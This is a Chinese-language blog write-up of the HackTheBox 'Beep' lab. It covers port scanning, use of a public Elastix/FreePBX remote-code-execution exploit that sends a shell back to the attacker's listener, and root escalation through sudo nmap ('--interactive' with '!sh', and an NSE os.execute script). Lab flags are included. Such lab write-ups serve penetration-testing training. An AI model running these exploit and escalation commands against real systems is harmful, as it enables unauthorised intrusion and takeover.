HackTheBox - Beep Write Up

已于 2023-04-04 15:29:40 修改
阅读量138 收藏
点赞数
分类专栏: HackTheBox 文章标签: 安全 web安全 网络安全
于 2023-04-03 00:13:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42575797/article/details/129920066
版权

OS:Linux
DIFFICULTY:Easy

0x01 信息收集

使用naabu扫描目标服务器端口

./naabu -host 10.10.10.7 -tp 1000 -nmap-cli 'nmap -sV'

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

                projectdiscovery.io

[INF] Current naabu version 2.1.5 (latest)
[INF] Running host discovery scan
[INF] Running SYN scan with CAP_NET_RAW privileges
[INF] Found 12 ports on host 10.10.10.7 (10.10.10.7)
10.10.10.7:25
10.10.10.7:3306
10.10.10.7:10000
10.10.10.7:111
10.10.10.7:22
10.10.10.7:4445
10.10.10.7:143
10.10.10.7:993
10.10.10.7:80
10.10.10.7:110
10.10.10.7:995
10.10.10.7:443
[INF] Running nmap command: nmap -sV -p 993,10000,22,4445,143,80,110,443,111,25,3306,995 10.10.10.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-02 22:22 CST
Nmap scan report for localhost (10.10.10.7)
Host is up (0.25s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 197.87 seconds

接下来绑定hosts

echo '10.10.10.7 beep.htb' >> /etc/hosts

该靶场扫描出多个端口,接下来我们先根据服务名称和版本号查询一下相关漏洞

搜索一圈好像也没有发现什么能利用的漏洞,暂时先放一放,先看web

访问web后发现这是一个 Elastix 的系统。Elastix 是一个开源的统一通信服务器,它由 PaloSanto Solutions 开发并在 GPL 许可证下发布。Elastix 集成了多种通信工具,包括 IP PBX、邮件服务器、即时通讯、传真和协作功能。

https://beep.htb/

明确了方向后,接下来搜索一下Elastix的相关历史漏洞,共搜索到了7个该系统相关的历史漏洞

0x02 漏洞利用

接下来进行漏洞利用,由于没有登录进系统也很难判断系统的版本号是多少,所以我们先来试一试最后一个远程代码执行漏洞FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution,看看能不能进行利用

在github中搜索关键词:Elastix exp,找到以下漏洞利用的项目

https://github.com/k4miyo/FreePBX-Elastix-RCE-exploit

使用也很简单,通过指定rhost、lhost、lport就可以执行了

将利用脚本下载到本地后,先安装pip依赖

pip3 install -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com pwn

执行以下命令进行漏洞利用,成功拿下普通用户权限

python elastix_rce.py --lhost 10.10.14.18 --lport 65001 --rhost 10.10.10.7

接下来 执行以下命令获得user的flag

find / -name "user.txt"
cat /home/fanis/user.txt

flag:
3ecaa69438fe1a828981f566dd11e1b1

0x03 权限提升

接下来进行权限提升,执行以下命令

sudo -l

Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

好家伙有这么多命令可以以root权限免密执行,而且这台靶机上竟然还装了nmap,那么我们就可以通过以下方式来进行权限提升:

第一种方式:编写NSE脚本进行提权

可以编写一个 NSE 脚本,nmap 支持使用 --script 参数来执行 NSE 脚本,使用 sudo 命令来以 root 用户的身份运行 nmap 并执行该脚本

sudo ehco 'os.execute("/bin/bash")' > /tmp/script.nse
sudo nmap --script=/tmp/script.nse

这些命令会创建一个 NSE 脚本,该脚本会在运行时执行 /bin/bash 命令。然后,它会使用 sudo 命令来以 root 用户的身份运行 nmap 并执行该脚本,这将会获得一个 root 权限的 shell。

结果尝试执行echo命令发现不能创建文件,而且只能在/tmp目录下面,不能cd到其他目录,使用sudo echo也无法创建文件,有点难受,不过nmap还有其他方式进行提权

第二种方式:使用interactive参数进行提权

  1. 执行 sudo nmap --interactive 命令进入 nmap 的交互式模式。
  2. nmap 的交互式模式下,执行 !sh 命令,即可反弹一个具有 root 权限的 shell。这是因为 ! 命令可以在当前 shell 下执行指定的命令,而 sh 命令可以启动一个新的 shell 进程。

执行以下命令成功提升到root权限!!!

sudo nmap --interactive
!sh

接下来获取root的flag

find / -name "root.txt"
cat /root/root.txt

flag:
a60d5947febadcd242e4ea7778bc8e97

Gh0stX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
beep-beep-beep-beep-beep:好好玩!
05-22
:headphone: :headphone: :headphone: :headphone: :headphone: :headphone: :headphone: :headphone: :headphone:用法作为CLI $ npm i beep-beep-beep-beep-beep -g$ beep-beep-beep-beep-beep作为一个模块 var ...
nodebb-plugin-beep:NodeBB插件,允许用户审查帖子中的诅咒单词
05-10
NodeBB审查员诅咒词 一个NodeBB插件,允许用户审查其帖子中的单词诅咒。 允许管理员创建使用时被审查的禁止使用的单词和网址的列表。 安装 npm install nodebb-plugin-beep 屏幕截图
打破冷漠僵局文章_保持冷静并打破僵局-北极
08-18 477
打破冷漠僵局文章Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world sc...
推箱子2-向右推!_保持冷静,砍箱子-银行
cumi7754的博客
08-21 552
推箱子2-向右推!Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real wor...
推箱子2-向右推!_保持冷静,砍箱子-奶奶
cumian8165的博客
08-18 481
推箱子2-向右推!Hack The Box (HTB) is an online platform that allows you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real ...
推箱子2-向右推!_保持冷静,砍箱子-爷爷
08-18 320
推箱子2-向右推!Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real wor...
打破冷漠僵局文章_保持冷静并打破僵局-最佳
cumi7754的博客
08-11 618
打破冷漠僵局文章Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world sc...
安卓游戏开发推箱子_保持冷静并砍箱子-开发
cumi7754的博客
08-11 488
打破冷漠僵局文章Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world sc...
推箱子2-向右推!_保持冷静并砍箱子-哔
cumi7754的博客
08-11 435
推箱子2-向右推!Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world s...
操作系统真像还原 - MBR主引导程序初体验
u014753756的博客
04-28 381
【代码】操作系统真像还原 - MBR主引导程序初体验。
Linux-4.4-x86_64 内核配置选项简介
ye1223的博客
11-08 4250
Linux-4.4-x86_64 内核配置选项简介 作者:金步国 版权声明 本文作者是一位开源理念的坚定支持者,所以本文虽然不是软件,但是遵照开源的精神发布。 无担保:本文作者不保证作品内容准确无误,亦不承担任何由于使用此文档所导致的损失。 自由使用:任何人都可以自由的阅读/链接/打印此文档,无需任何附加条件。 名誉权:任何人都可以自由的转载/引用/再创作此文档,但必须保留作者署名并注...
HZ_8051-Beep.rar_beep
09-19
《HZ_8051-Beep》是一个关于8051微控制器使用蜂鸣器进行音频输出的教程。8051是经典的单片机系列,广泛应用于电子设备、工业控制、家用电器等领域。本教程由作者原创,旨在帮助学习者掌握8051微控制器如何驱动蜂鸣器...
IO-BEEP.rar_beep_buzzer beep_io
09-22
标题“IO-BEEP.rar_beep_buzzer beep_io”暗示了这是一个关于使用输入/输出(I/O)口控制蜂鸣器(buzzer)的程序,主要涉及C语言编程。蜂鸣器在电子工程中通常用于发出声音信号,而通过I/O口进行控制是微控制器或...
my-2440-beep.rar_beep_linux 2.6.30 s3c24
09-14
《Linux 2.6.30内核在S3C2440上的Beep设备驱动解析》 在嵌入式系统开发中,理解和掌握设备驱动的编写是至关重要的一步,尤其是在Linux环境下。本篇文章将深入探讨Linux 2.6.30内核在三星S3C2440处理器上的Beep...
第135天:内网安全-横向移动&非约束委派&约束委派&数据库攻防
最新发布
weixin_71529930的博客
08-24 342
非约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派,约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管。利用该身份就可以访问域控,记得用主机名去访问。(域控)访问具有非约束委派权限的机器。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
一点硬件
08-20 364
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
SD-WAN安全:在灵活性与安全性之间找到平衡
A526847的博客
08-21 462
随着企业业务的不断扩展和数字化转型的加速,网络架构的灵活性和安全性成为了企业关注的重点。SD-WAN(软件定义广域网)作为一种新兴的网络架构,通过软件定义和虚拟化技术,为企业提供了更灵活、可靠、经济高效的广域网连接方案。然而,在追求灵活性的同时,如何确保网络的安全性,成为了SD-WAN应用中的一大挑战。本文将探讨SD-WAN如何在灵活性与安全性之间找到平衡。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 490
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
C++函数之---Beep函数
07-28
Beep函数是一个Windows API函数,用于在计算机上发出声音。它的原型为:WINBASEAPI WINBOOL WINAPI Beep (DWORD dwFreq, DWORD dwDuration)。\[1\]该函数接受两个参数,dwFreq表示要发出的声音的频率,dwDuration...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Gh0stX

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值